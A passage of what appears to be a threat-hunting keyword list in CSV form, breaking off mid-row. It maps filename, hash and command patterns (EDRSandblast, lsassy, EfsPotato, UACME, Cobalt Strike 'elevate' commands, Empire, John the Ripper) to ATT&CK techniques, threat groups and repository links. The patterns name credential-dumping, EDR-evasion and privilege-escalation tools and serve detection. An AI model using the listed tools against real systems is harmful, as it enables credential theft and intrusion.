-*EDRSandblast.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandBlast.h*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*edrsandblast.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*EDRSandblast.sln*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EDRSandblast.sln*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast.vcxproj*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_API.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_API.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_API.h*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_CLI*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EDRSandblast_LsassDump*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EDRSandblast_LsassDump.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_LsassDump.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast_StaticLibrary*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EDRSandblast-GodFault*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*EDRSandblast-master*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*EEC35BCF-E990-4260-828D-2B4F9AC97269*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*eeriedusk/nysm*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*EfsPotato-*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z -*EfsPotato*efsrpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato*lsarpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato*lsarpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato*lsass*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato*netlogon*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato*samr*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*EfsPotato-main*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z -*egblhcjfjmbjajhjhpmnlekffgaemgfh*,greyware_tool_keyword,Fornex VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*EgeBalci/amber@latest*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*EggShell.py*,offensive_tool_keyword,Eggshell,EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own,T1027 - T1553 - T1003 - T1059 - T1558.001,TA0002 - TA0006 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/neoneggplant/EggShell,1,1,N/A,N/A,10,1562,404,2021-03-25T22:04:52Z,2015-07-02T16:58:30Z -*Egress-Assess Exfil Data*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,email subject,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Egress-Assess Report*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Egress-Assess transfer share*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*EgressAssess With Attachment*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,email body,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Egress-Assess.*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*EgressAssess.ps1*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*Egress-Assess-master*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*egressbuster*,offensive_tool_keyword,egressbuster,EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.,T1046 - T1570 - T1590,TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/trustedsec/egressbuster,1,1,N/A,N/A,4,327,104,2021-02-17T00:54:07Z,2015-05-14T02:19:26Z -*egresscheck-framework*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EgressCheck.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*ehbhfpfdkmhcpaehaooegfdflljcnfec*,greyware_tool_keyword,WeVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*eidnihaadmmancegllknfbliaijfmkgo*,greyware_tool_keyword,Push VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*ejabberd2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*ejkaocphofnobjdedneohbbiilggdlbi*,greyware_tool_keyword,Hotspot Shield Elite VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A -*elastic-agent.exe uninstall*,greyware_tool_keyword,elastic-agent,uninstall elast-agent from the system,T1562.004 - T1070.004,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,6,8,N/A,N/A,N/A,N/A -*eldraco/domain_analyzer*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z -*electrum2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*elevate juicypotato *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*elevate Printspoofer*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,0,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z -*elevate svc-exe *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*ElevatePrivs*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*elevationstation.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*elevationstation.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*elevationstation.git*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*elevationstation.sln*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*elevationstation-main*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*ElevenPaths*FOCA*,offensive_tool_keyword,FOCA,FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.,T1556 - T1566 - T1213 - T1212 - T1565,TA0005 - TA0009,N/A,N/A,Information Gathering,https://github.com/ElevenPaths/FOCA,1,0,N/A,N/A,10,2495,519,2022-12-08T09:31:55Z,2017-10-02T17:05:06Z -*ELFLoader.c*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/ELFLoader,1,1,N/A,10,10,204,40,2022-05-16T17:48:40Z,2022-04-26T19:18:20Z -*ELFLoader.h*,offensive_tool_keyword,cobaltstrike,This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and 